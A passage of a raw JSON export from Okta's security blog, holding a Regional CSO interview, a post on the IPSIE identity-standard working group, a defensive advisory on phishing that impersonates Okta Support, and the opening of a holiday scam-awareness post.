\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Okta’s corporate values\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" in your day to day?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Personally, in my role as a Regional CSO, I spend a lot of time with Okta’s customers, and am particularly fond of our “Love our Customers” value. Many companies are closed off when it comes to security, and there can be merit to this, because you never want to tip your hand or expose potential areas of weakness publicly before you’re ready. However, this does not mean security should be a black box. When there is information that should be made public, it is best to be loud and on the verge of oversharing. What good is releasing information to mitigate a vulnerability if you bury it deep in the release notes somewhere? When a security team is putting the time and effort into identifying risk and providing mitigations to customers, every effort should be made to be transparent. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane-on-the-road/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Oktane on the Road\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" brings \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Oktane\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" to those who couldn’t attend in Las Vegas, can you share some of your experiences?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Having done Oktane on the Road events in the past, I would say it brings tremendous value to our customers. Cost cutting and tight budgets are prevalent right now, and many times, the first thing to go is travel and conference money. The customers I have interacted with at these events are appreciative of the local engagement allowing them to hear about the latest and greatest from Okta and interact with Okta employees, while not having to break the bank on travel. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"In your opinion, what is the best part of your Regional CSO role?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Building relationships with our customers. I speak to our customers on a regular basis across the entire US. In my role, I am afforded the ability to have very transparent conversations on issues relevant to their security teams. Having this level of engagement with our customers throughout every industry lets me hear and understand the differences in the experiences and what threats each individual industry might be facing. Retail and Hospitality have different concerns than large banks and financial institutions, but I often find commonalities and am able to bring different perspectives to these conversations by being able to reference an experience or a solution from another industry that might not have been considered otherwise.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Matt Immler was recently featured at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Oktane24\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in Lessons learned from the Okta frontlines in addition to a live news desk session on \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta’s Secure Identity Commitment (OSIC)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". Matt also participated in a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/webinars/hub/fireside-chat--security-outcomes-powered-by-identity/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Fireside Chat\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" on Security Outcomes Powered by Identity. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-01-23T21:41:44.376Z","secAuthor":[{"id":"c48d5ee4-19d0-5916-b1a9-0edf2a45f611","bio":{"bio":"Matt Immler is the Regional Chief Security Officer for Okta in the Eastern Americas, where he leverages his Identity expertise to drive customer success. Matt’s background includes Auth0 Security and Compliance, in addition to previous roles in information security, network operations and software engineering. His educational achievements include a Bachelor of Computer Science from the University of Maryland Baltimore County and a Masters in Information Technology Management from the University of Maryland Global Campus. In his downtime, Matt enjoys volunteering at a local theatre company in support of his kids.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6Tv1MPNtUrsW9mrykUviAH/ff8a5a5bbeb663905cca908bcafcef25/matt_immler.jpg"},"name":"Matt Immler","jobTitle":"Regional Chief Security Officer","slug":"/hackers/matt-immler","node_locale":"en"}]},{"slug":"/articles/2025/01/raising-the-bar-for-the-industry-with-ipsie","id":"024c6441-82bd-51aa-bb54-5c9168ee7c31","title":"Raising the Bar for our Industry with IPSIE","date":"2025-01-15T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s vision of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"building a world where anyone can safely use any technology,\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" powered by their Identity, continues to be our guiding factor. Today, almost 20,000 customers rely on Okta’s industry-leading Identity solutions worldwide in nearly every industry sector.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Early last year, Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/02/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"announced\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment (OSIC)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a long-term pledge to lead the industry in the fight against Identity attacks. The Commitment consists of four pillars, including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Raising the bar for our industry.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" We’re committed to making this a reality.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The rise in Identity-based attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on Okta’s internal reporting, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta detects and blocks over 3 billion attacks per month. \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"We protect over 800 million unique monthly users from cyber threats, ranging from credential stuffing to malicious bots. Enterprise anonymized data confirmed that over a 90-day period, we reduced credential stuffing attempts and malicious bot traffic by more than 90% for some of our largest customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From year to year, motivated threat actors employ new and innovative techniques in their ongoing efforts to gain unauthorized access. In a 2024 report in which Okta participated, Verizon concluded \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"68%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involved a human element, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"24%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" involved the use of stolen credentials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we continue to live our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"corporate values\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by enforcing industry best practices; 100% of Okta employees use phishing-resistant authentication solutions like Okta FastPass with device assurance and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/adaptive-multi-factor-authentication/?utm_source=google&utm_campaign=amer_can_can_all_wf-all_dg-ao_a-wf_search_google_text_kw_nonbrand-priority_utm2&utm_medium=cpc&utm_id=aNK4z000000bmPNGAY&gad_source=1&gclid=Cj0KCQiAj9m7BhD1ARIsANsIIvA6Y4i7qKcCTEjS79AJaoH79abvvd0o6olBO0FW2jrNxZMTQ2FWX4MaArpCEALw_wcB\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adaptive Multi-Factor Authentication (AMFA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". To learn more about MFA and phishing-resistant authentication, download our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-In Trends Report 2024.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A new industry standard\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To set the stage and advance the tech sector, the OpenID Foundation (OIDF) recently announced the formation of a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/press-room/press-releases/okta-openid-foundation-tech-firms-tackle-todays-biggest-cybersecurity/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"working group\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with support from Okta, Ping Identity, Microsoft, SGNL, Beyond Identity, and Capital One. The Interoperability Profiling for Secure Identity in the Enterprise, or IPSIE, is the name of the OpenID Foundation working group tasked with establishing this new Identity standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last year’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane messaging\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" heavily focused on the theme of possibility. When introducing Okta’s commitment to IPSIE at Oktane24 in Las Vegas, Okta CEO and Co-Founder Todd McKinnon said, “The goal with IPSIE is to standardize identity security and help foster an open ecosystem where building and using enterprise applications that are secure by default is easy for everyone.” \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To support the integration of critical identity security capabilities in SaaS applications, the IPSIE working group intends to collaboratively focus on:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single sign-on\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lifecycle management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Entitlements, such as Governance and Privileged Access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk signal sharing\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session termination\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, representatives from 25 unique companies are coming together each week to collaborate with meaningful discussion in pursuit of advancing this innovative industry standard. Open and available to all, the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/openid/ipsie/wiki\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IPSIE working group\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" has the potential to transform enterprise SaaS security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Joining forces and coming together\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Andrew Carnegie expressed his belief in collaboration as a powerful force for achieving greater success by famously stating, “Teamwork is the ability to work together toward a common vision. The ability to direct individual accomplishments toward organizational objectives. It is the fuel that allows common people to attain uncommon results.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IPSIE aims at fostering a more open, consistent, flexible SaaS ecosystem by empowering organizations to adhere to a higher level of security, more seamlessly and efficiently integrating amongst tech stacks. It also increases visibility across the Identity threat surface to better help protect against cyber attacks. Okta is excited to support and participate in the working group because we believe that a unifying industry standard is the key to fostering an open ecosystem, where it’s both seamless and efficient to build and use enterprise apps that are secure by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recently published integrations with 50 leading enterprise SaaS applications including Google, Microsoft Office 365, Slack and Salesforce that support modern identity best practices aimed at enhancing security and reducing operational burden. Each integration takes just seconds to set up and requires virtually no ongoing maintenance, giving enterprises instant access to capabilities for their most-used apps such as Universal Logout with the ability to immediately terminate user sessions when a threat is detected. These integrations best meet the tech landscape and customers where they are today, while better protecting systems and data going forward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ll keep you posted\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we continue to progress on the new IPSIE standard within the OpenID Foundation working group, take comfort in knowing we will continue to keep you updated. Okta is committed to working with third-party standards bodies, Identity providers and SaaS vendors to continue to get you more visibility of evolving threats. The working group aims to have the first set of draft specifications published in early 2025.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/11/help-reshape-identity-security-join-the-ipsie-working-group/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Join us\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in our fight against Identity-based attacks, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/announcing-ipsie-working-group/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on how to get involved with the OpenID Foundation working group to tackle key Identity security challenges in today’s enterprise environments.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"To set the stage and advance the tech sector, the OpenID Foundation (OIDF) recently announced the formation of a new working group with support from Okta, Ping Identity, Microsoft, SGNL, Beyond Identity, and Capital One. The Interoperability Profiling for Secure Identity in the Enterprise, or IPSIE, is the name of the OpenID Foundation working group tasked with establishing this new Identity standard."},"updatedAt":"2025-01-16T14:12:22.279Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2024/okta-social-engineering-report-response-and-recommendation","id":"b31bd80e-760c-5413-863f-f8252e8eae0d","title":"Okta Social Engineering Impersonation Report - Response and Recommendation","date":"2024-12-11T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has identified an increase in phishing social engineering attempts claiming to be from Okta Support. This report provides guidance on what you can expect when getting technical assistance from Okta Support, or contact from Okta. If you receive suspicious contact claiming to be Okta, please promptly inform Okta Security at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:security@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What can you expect?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the event a support case is open, Okta Support may contact you by phone or email. The Okta Support call will include an initial validation process for authorized representatives by both phone and email. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Support will not ask for your password or for an MFA token.\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the case of a significant security-related concern, Okta customers will receive a rapid communication alert. Rapid alerts will only be received by your organization’s security & privacy contact(s) and primary IT contact(s) via the information in their respective profiles, which must be up-to-date to successfully communicate with you.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta may contact you from the following verified channels:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Email\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Support emails will be from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:okta@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"support@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:support@auth0.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"support@auth0.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and Okta emails will be sent from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:noreply@securityalerts.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"noreply@securityalerts.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:noreply@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"noreply@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. SMS\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Text alerts are sent from SMS numbers or short codes that may vary by country. In the US, they are from 893-61.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Phone\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Okta Support may contact you by phone, with numbers ranging by region. Please note incoming calls could potentially be spoofed by threat actors who deliberately falsify the caller ID displayed in order to disguise their Identity. Incoming caller ID alone should not validate the caller as authentic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What can you do?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Social engineering scams prey on urgency and emotional reaction. When receiving suspicious, unsolicited contact, be vigilant of the following common indicators of social engineering:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious email address\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A social engineering sender will often imitate the address of a legitimate business or organization however some characters may vary, be omitted, or misspelled.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Urgency and emotional response\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recognizable signs of an attempt include urgency and manipulation of an emotional response as tactics. In these cases, social engineering attackers may use time-sensitive situations and/or a narrative to invoke an emotional response with the goal of coercing impulsive decisions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Spelling, grammar and layout\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most obvious indicators is a message with poor sentence structure, improper grammar and incorrect spelling. In some cases, the layout including formatting of the message is irregular. It should be noted that with the emergence of AI technology, spelling and grammar errors are not always obvious, or even present.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious links or attachments\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsolicited email or SMS messages including attachments or links should be verified prior to opening, especially if the messaging involves a sense of urgency.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more information on how to protect yourself, your workforce, your business and your customers, read up on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-ultimate-guide-to-phishing/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Ultimate Guide to Phishing Prevention\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to report Okta Impersonation Attempts?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you come across a suspected impersonation attempt of Okta or Okta Support as a customer, please promptly raise a customer support ticket or inform Okta Security by email at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:security@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta has identified an increase in phishing social engineering attempts. This report provides guidance on what you can expect when getting technical assistance from Okta Support, or contact from Okta."},"updatedAt":"2024-12-19T21:22:49.122Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2024/cyber-safety-over-the-holidays","id":"3caf3c93-bbbf-5f71-bb74-90b8970e9893","title":"Cyber-Safety over the Holidays","date":"2024-12-18T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In 2023, consumers worldwide lost over \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.gasa.org/post/global-state-of-scams-report-2024-1-trillion-stolen-in-12-months-gasa-feedzai#:~:text=Based%20on%20responses%20from%2058%2C329,the%20GDP%20of%20some%20nations.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"$1 trillion\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to scams with wide-ranging economic and emotional consequences. Despite significant efforts dedicated to combatting scam-based cybercrime, many continue to fall victim to ever-evolving threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s market-leading Identity solutions continually evolve as mission-critical security infrastructure to combat Identity-based attacks. Over a 30-day period, Okta has blocked over \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"3 billion attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" including credential stuffing and malicious bots, securing nearly 20,000 customers globally. We invite you to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn 